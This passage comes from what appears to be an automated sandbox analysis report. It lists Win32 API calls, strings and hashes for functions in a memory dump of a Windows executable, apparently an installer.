                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3808407030-0
                                                                                                                                        • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                                                        • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                                                                        • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                                                        • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                                                        • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                                                                                                        • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                                                                                                        • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                                                                                                        • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                                                                                                        • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                                                                                                        • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                                                                                                        • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3850602802-0
                                                                                                                                        • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                                                        • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                                                                                                        • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                                                                                                        • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                                                                                                        • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                                                                                                        • GetDC.USER32(00000000), ref: 0041BC12
                                                                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1095203571-0
                                                                                                                                        • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                                                        • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                                                                                                        • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                                                                                                        • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                                                                                                        Strings
                                                                                                                                        • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                                                                                                        • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                                                                                                        • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                                                                        • API String ID: 1452528299-4018462623
                                                                                                                                        • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                                                        • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                                                                                                        • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                                                                                                        • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$AllocString
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 262959230-0
                                                                                                                                        • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                                                        • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                                                                        • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                                                                                                        • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                                                                        APIs
                                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                                                                                                        • RealizePalette.GDI32(00000000), ref: 00414421
                                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                                                                                                        • RealizePalette.GDI32(00000000), ref: 0041443B
                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Palette$RealizeSelect$Release
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2261976640-0
                                                                                                                                        • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                                                        • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                                                                                                        • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                                                                                                        • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                                                                                          • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                                                                                          • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                                                                                          • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                                                                                                        • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                                                                                                        • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                                                                                                        • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                                                                                          • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                                                                                          • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                                                                                          • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                                                                                          • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                                                                                                        • String ID: vLB
                                                                                                                                        • API String ID: 1477829881-1797516613
                                                                                                                                        • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                                                        • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                                                                                                        • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                                                                                                        • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                                                                                                        APIs
                                                                                                                                        • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                                                                                                        • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                                                                                                        • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Enum$NameOpenResourceUniversal
                                                                                                                                        • String ID: Z
                                                                                                                                        • API String ID: 3604996873-1505515367
                                                                                                                                        • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                                                        • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                                                                                                        • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                                                                                                        • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                                                                                                        APIs
                                                                                                                                        • SetRectEmpty.USER32(?), ref: 0044D04E
                                                                                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                                                                                                        • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DrawText$EmptyRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 182455014-2867612384
                                                                                                                                        • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                                                        • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                                                                                                        • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                                                                                                        • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(00000000), ref: 0042EF9E
                                                                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFontIndirectObjectReleaseSelect
                                                                                                                                        • String ID: ...\
                                                                                                                                        • API String ID: 3133960002-983595016
                                                                                                                                        • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                                                        • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                                                                                                        • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                                                                                                        • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                                                                                                        APIs
                                                                                                                                        • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                                                        • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                                                        • RegisterClassA.USER32(?), ref: 004164CE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Class$InfoRegisterUnregister
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 3749476976-2766056989
                                                                                                                                        • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                                                                        • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                                                                                                        • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                                                                                                        • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                                                                                                        • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Attributes$Move
                                                                                                                                        • String ID: isRS-%.3u.tmp
                                                                                                                                        • API String ID: 3839737484-3657609586
                                                                                                                                        • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                                                                        • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                                                                                                        • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                                                                                                        • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                                                                                                        APIs
                                                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00404E0D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitMessageProcess
                                                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                                                        • API String ID: 1220098344-2970929446
                                                                                                                                        • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                                        • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                                                                                                        • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                                                                                                        • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                                                                                          • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                                                                          • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                                                                        • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                                                                                                        • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                                                                                                        • String ID: LoadTypeLib$RegisterTypeLib
                                                                                                                                        • API String ID: 1312246647-2435364021
                                                                                                                                        • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
